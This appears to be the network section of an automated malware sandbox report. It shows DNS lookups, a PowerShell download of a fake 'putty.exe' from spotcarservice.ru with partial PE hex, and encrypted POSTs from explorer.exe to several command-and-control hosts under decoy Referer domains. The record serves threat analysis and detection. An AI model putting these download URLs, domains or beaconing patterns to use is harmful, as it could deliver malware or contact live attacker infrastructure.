                                                                                                                    Dec 19, 2024 07:54:01.765800953 CET804971194.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:01.765872002 CET4971180192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:01.766261101 CET804971294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:01.766343117 CET4971280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:19.986960888 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:20.106800079 CET804981994.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:20.106887102 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:20.107023001 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:20.107040882 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:20.226538897 CET804981994.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:20.226587057 CET804981994.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:21.486141920 CET804981994.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:21.491576910 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:21.611479044 CET804982594.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:21.611583948 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:21.611717939 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:21.611737013 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:21.614260912 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:21.731302023 CET804982594.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:21.731327057 CET804982594.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:22.981556892 CET804982594.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:23.185314894 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:23.208125114 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:23.305015087 CET8049826109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:23.305094957 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:23.305304050 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:23.305330038 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:23.424854040 CET8049826109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:23.424871922 CET8049826109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:24.645281076 CET8049826109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:24.692617893 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:25.031029940 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.031727076 CET4983280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.151218891 CET804981994.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:25.151297092 CET804983294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:25.151372910 CET4981980192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.151444912 CET4983280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.151771069 CET4983280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.151771069 CET4983280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:25.271356106 CET804983294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:25.271375895 CET804983294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:26.507935047 CET804983294.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:26.515283108 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.515908957 CET4983880192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.614279032 CET4983280192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.635296106 CET804982594.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:26.635406971 CET804983894.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:26.635541916 CET4982580192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.635545969 CET4983880192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.635723114 CET4983880192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.635741949 CET4983880192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:26.755326986 CET804983894.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:26.755578041 CET804983894.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:27.998553991 CET804983894.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:28.001763105 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.002440929 CET4984380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.083024979 CET4983880192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:54:28.121673107 CET8049826109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:28.121726990 CET4982680192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.121921062 CET8049843109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:28.122144938 CET4984380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.122318029 CET4984380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.122318029 CET4984380192.168.2.8109.70.26.37
                                                                                                                    Dec 19, 2024 07:54:28.241815090 CET8049843109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:28.241847992 CET8049843109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:29.461914062 CET8049843109.70.26.37192.168.2.8
                                                                                                                    Dec 19, 2024 07:54:29.692497015 CET4984380192.168.2.8109.70.26.37
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 19, 2024 07:52:22.568146944 CET5257753192.168.2.81.1.1.1
                                                                                                                    Dec 19, 2024 07:52:22.707828045 CET53525771.1.1.1192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:49.121526957 CET5027953192.168.2.81.1.1.1
                                                                                                                    Dec 19, 2024 07:52:49.261387110 CET53502791.1.1.1192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:50.774158001 CET5012053192.168.2.81.1.1.1
                                                                                                                    Dec 19, 2024 07:52:50.938545942 CET53501201.1.1.1192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:52.589659929 CET6229253192.168.2.81.1.1.1
                                                                                                                    Dec 19, 2024 07:52:52.729084015 CET53622921.1.1.1192.168.2.8
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 19, 2024 07:52:22.568146944 CET192.168.2.81.1.1.10xf89aStandard query (0)spotcarservice.ruA (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:49.121526957 CET192.168.2.81.1.1.10xfc09Standard query (0)constractionscity1991.latA (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:50.774158001 CET192.168.2.81.1.1.10x9765Standard query (0)restructurisationservice.ruA (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:52.589659929 CET192.168.2.81.1.1.10x50bdStandard query (0)connecticutproperty.ruA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 19, 2024 07:52:22.707828045 CET1.1.1.1192.168.2.80xf89aNo error (0)spotcarservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:49.261387110 CET1.1.1.1192.168.2.80xfc09No error (0)constractionscity1991.lat94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:50.938545942 CET1.1.1.1192.168.2.80x9765No error (0)restructurisationservice.ru94.156.177.51A (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:52.729084015 CET1.1.1.1192.168.2.80x50bdNo error (0)connecticutproperty.ru109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                    Dec 19, 2024 07:52:52.729084015 CET1.1.1.1192.168.2.80x50bdNo error (0)connecticutproperty.ru194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                    • spotcarservice.ru
                                                                                                                    • eatxyeykjsmocbq.com
                                                                                                                      • constractionscity1991.lat
                                                                                                                    • vqoifgeqmslm.com
                                                                                                                      • restructurisationservice.ru
                                                                                                                    • cpgkhdyexjobuel.net
                                                                                                                      • connecticutproperty.ru
                                                                                                                    • kssjunoucpo.net
                                                                                                                    • dgibnmnukcth.com
                                                                                                                    • lygvohbryeni.com
                                                                                                                    • hpkihdgfpdwnih.org
                                                                                                                    • yitqmxmwjwycdun.org
                                                                                                                    • yfnvfnqkorbos.net
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.84970694.156.177.51806012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:52:22.836143970 CET94OUTGET /fdjskf88cvt/yumba/putty.exe HTTP/1.1
                                                                                                                    Host: spotcarservice.ru
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 19, 2024 07:52:24.202955961 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:52:23 GMT
                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                    Content-Length: 295424
                                                                                                                    Connection: keep-alive
                                                                                                                    Last-Modified: Thu, 19 Dec 2024 06:52:23 GMT
                                                                                                                    ETag: W/"48200-62999fe73c900"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 cf c2 6a d7 ae ac 39 d7 ae ac 39 d7 ae ac 39 c9 fc 39 39 cd ae ac 39 c9 fc 2f 39 51 ae ac 39 c9 fc 28 39 fd ae ac 39 f0 68 d7 39 d4 ae ac 39 d7 ae ad 39 ac ae ac 39 c9 fc 26 39 d6 ae ac 39 c9 fc 38 39 d6 ae ac 39 c9 fc 3d 39 d6 ae ac 39 52 69 63 68 d7 ae ac 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 c4 9b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 03 00 00 04 01 00 00 00 00 00 a2 49 00 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 ba f9 04 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$j999999/9Q9(99h9999&99899=99Rich9PELwdI@((9P.@.text `.data`@.rsrc9:H@@
                                                                                                                    Dec 19, 2024 07:52:24.202984095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc eb 03 00 f0 eb 03 00 08 ec 03 00 20 ec 03 00 34 ec 03 00 52 ec 03 00 68 ec 03 00 7c ec 03 00 96
                                                                                                                    Data Ascii: 4Rh| <Pjz2@N^r$BVbn
                                                                                                                    Dec 19, 2024 07:52:24.202996969 CET1236INData Raw: 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c 6f 61 64 20 74 68 65 20 43 20 72 75 6e 74 69 6d 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 74 6c 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
                                                                                                                    Data Ascii: on has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates
                                                                                                                    Dec 19, 2024 07:52:24.203110933 CET1236INData Raw: 00 52 36 30 30 32 0d 0a 2d 20 66 6c 6f 61 74 69 6e 67 20 70 6f 69 6e 74 20 73 75 70 70 6f 72 74 20 6e 6f 74 20 6c 6f 61 64 65 64 0d 0a 00 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 52 75 6e 74 69 6d 65 20 4c 69 62 72
                                                                                                                    Data Ascii: R6002- floating point support not loadedMicrosoft Visual C++ Runtime Library...<program name unknown>Runtime Error!Program:
                                                                                                                    Dec 19, 2024 07:52:24.203123093 CET896INData Raw: 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75
                                                                                                                    Data Ascii: tor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RTTI`EH`udt returning'`copy cons
                                                                                                                    Dec 19, 2024 07:52:24.203674078 CET1236INData Raw: 74 72 36 34 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 62 61 73 65 64 28 00
                                                                                                                    Data Ascii: tr64__clrcall__fastcall__thiscall__stdcall__pascal__cdecl__based("@"@"@!@!@!@!@!@!@!@@@@@@@!@!@@!@!@!@!@!@!@|!@x!@t!@p!@l!@h!@d!@`!@\!@X!@T!@P!@L!@H!@D!
                                                                                                                    Dec 19, 2024 07:52:24.203685999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: h((((
                                                                                                                    Dec 19, 2024 07:52:24.203697920 CET1236INData Raw: 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c
                                                                                                                    Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
                                                                                                                    Dec 19, 2024 07:52:24.203809023 CET1236INData Raw: 00 07 9f 00 00 20 cb 00 00 14 ee 00 00 90 e3 03 00 b8 e3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8b f1 c7 06 44 2e 40 00 e8 98 0b 00 00 f6 45 08 01 74 09 56 e8 4a 11 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc cc
                                                                                                                    Data Ascii: UVD.@EtVJ^]lfJDmf>Dgf@D3dlfHDfNDfLD.2mfFDfDDf8Di3sh8Df<DfBDf:D(@
                                                                                                                    Dec 19, 2024 07:52:24.203821898 CET1236INData Raw: 00 8d 64 24 00 8b 15 70 9b 44 00 8a 84 32 4b 13 01 00 8b 0d c4 87 44 00 88 04 31 a1 34 8d 44 00 3d 90 04 00 00 75 1f 6a 00 ff 15 08 10 40 00 6a 00 ff d7 8d 55 f0 52 6a 00 8d 45 d8 50 6a 00 ff d3 a1 34 8d 44 00 46 3b f0 72 ba 33 ff 8b 3d 94 10 40
                                                                                                                    Data Ascii: d$pD2KD14D=uj@jURjEPj4DF;r3=@30u0jRjjjjjjEP@MQ@4DF|5Dv9 @I4D=Yujjjjjp@V\u=@33,}
                                                                                                                    Dec 19, 2024 07:52:24.322731018 CET1236INData Raw: c8 b0 ac e5 3b b8 41 0c 7f 5f f7 65 e0 8b 45 e0 81 45 ec 72 05 d3 33 81 6d 80 04 80 9e 78 81 6d c0 bd 75 57 5a 81 45 f0 7b fd 65 23 81 45 a8 95 91 b9 13 81 45 c0 41 19 58 4b 81 45 d8 ff d1 d0 41 b8 a6 16 da 01 f7 65 d0 8b 45 d0 81 45 94 6a ef 04
                                                                                                                    Data Ascii: ;A_eEEr3mxmuWZE{e#EEAXKEAeEEj03=bf@=2{|\>DVW4D5L@7=4DutQju_3^]~rFP(3FFfN|pDpDL


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.84971194.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:52:49.390074968 CET285OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://eatxyeykjsmocbq.com/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 349
                                                                                                                    Host: constractionscity1991.lat
                                                                                                                    Dec 19, 2024 07:52:49.390074968 CET349OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e5 0a 3a ce
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC):.!pj.&P)dW'IOM+GHe)/V2}G}mf k~~f%=[n%x<E#s9?pMg|,SJdtj6U
                                                                                                                    Dec 19, 2024 07:52:50.769890070 CET595INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:52:50 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.84971294.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:52:51.061706066 CET284OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://vqoifgeqmslm.com/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 163
                                                                                                                    Host: restructurisationservice.ru
                                                                                                                    Dec 19, 2024 07:52:51.061706066 CET163OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8e 12 21 8a
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)!Q"4aI$#$2D_F:,Y$Wc=i2P5yB5Io
                                                                                                                    Dec 19, 2024 07:52:52.585639000 CET597INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:52:52 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.849713109.70.26.37804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:52:52.849927902 CET282OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://cpgkhdyexjobuel.net/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 164
                                                                                                                    Host: connecticutproperty.ru
                                                                                                                    Dec 19, 2024 07:52:52.849965096 CET164OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bd 51 66 84
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)QfWtE1Cp1Wp=PoKp;xQKhz2d(cFz-3mp


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.84981994.156.177.51804084C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 19, 2024 07:54:20.107023001 CET281OUTPOST / HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://kssjunoucpo.net/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Length: 225
                                                                                                                    Host: constractionscity1991.lat
                                                                                                                    Dec 19, 2024 07:54:20.107040882 CET225OUTData Raw: a1 5f 7d 55 8e 47 51 ca c1 4c ae bf fc b0 2a 4b 57 32 b0 59 61 c0 36 2b d9 52 b8 18 76 88 05 54 c8 54 ac fc 4d aa 73 42 2a bd cd 0d af 49 12 32 a2 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 91 5c 31 dd
                                                                                                                    Data Ascii: _}UGQL*KW2Ya6+RvTTMsB*I2x]2m-^JrC)\18M'Mmnc/;Ax3<:a%.\;[Mz[kkI!@kl~ub3bt~>t'A;K`UINi'|x
                                                                                                                    Dec 19, 2024 07:54:21.486141920 CET595INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 19 Dec 2024 06:54:21 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
